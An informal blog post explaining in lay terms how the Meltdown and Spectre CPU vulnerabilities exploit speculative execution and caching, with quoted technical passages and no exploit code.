Meltdown and Spectre
Meltdown and Spectre are two big vulnearbilities found in Intel and AMD chips out of there. The vulenarbility is so huge it affects up to 1995 chips.
On the raspberrypi, there is a very nice explanation of what Meltdown is.
First of all, the one who discovered this bug is a GENIUS, for sure.
The trick match two observation.
Fact 1: speculation
Putting a lot of chips in parallel costs a lot, so the old Von Neumann model (1 chip, 1 bus, 1 RAM etc) was still the winning move on 1990.To push speed, we can add more ALU (artihmetic unit) on the chip. So we can try to execute some operation in parallel, even if they are presented serially, if and only if the final results is the same.
Reordering sequential instructions is a powerful way to recover more instruction-level parallelism, but as processors become wider (able to triple- or quadruple-issue instructions) it becomes harder to keep all those pipes busy. Modern processors have therefore grown the ability to speculate. Speculative execution lets us issue instructions which might turn out not to be required (because they may be branched over): this keeps a pipe busy (use it or lose it!), and if it turns out that the instruction isn’t executed, we can just throw the result away.The Intel chips execute two branches of an if, and then throw away the result it need not. But if you try to access to a illegal location (like a kernel protected are), the chip does it and emit an exception only if the branch is effectly executed (FACT1).
But if the illegal access is execute and the the result is thrown away, the chip "caches" the memory location in its fast internal RAM caches.
It is called "implicit caching".
Fact 2: caching
Now because of caching, you can trick the chip to read two distant uncached memory area based on a bit stored on a protected kernel area...and bummm you have just discovered a way to dump your internal address space.Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Because a lot of server run in cloud environment, this exposes cloud provider to ability to read sensitive data of other customers, as far as we can understand.
The fix was rolled out after six months of hard work, and today the "solution" is a slow software workaround at operating system level.
Is this a bug?
Difficult to say. For sure speculation and instruction reordering is a very complex algorithm, and some humble ARM chips did not have it. But some advanced ARM, AMD and Intel chips does it: it is a "common" technology nowadays. Like fast carry on addition algorithm. Raspberry Pi is totally untouched by this vulnerability, this is the only good news. But a lot of chips can be attacked in this way.Spectre uses a more subtle attack, "training" speculative execution (bold are us):
For example when the program’s control flow depends on an uncached value located in the physical memory, it may take several hundred clock cycles before the value becomes known. Rather than wasting these cycles by idling, the processor guesses the direction of control flow, saves a checkpoint of its register state, and proceeds to speculatively execute the program on the guessed path. When the value eventually arrives from memory the processor checks the correctness of its initial guess. If the guess was wrong, the processor discards the (incorrect) speculative execution by reverting the register state back to the stored checkpoint, resulting in performance comparable to idling. In case the guess was correct, however, the speculative execution results are committed, yielding a significant performance gain as useful work was accomplished during the delay.
Extra Resources
About Latency
https://github.com/colin-scott/interactive_latencies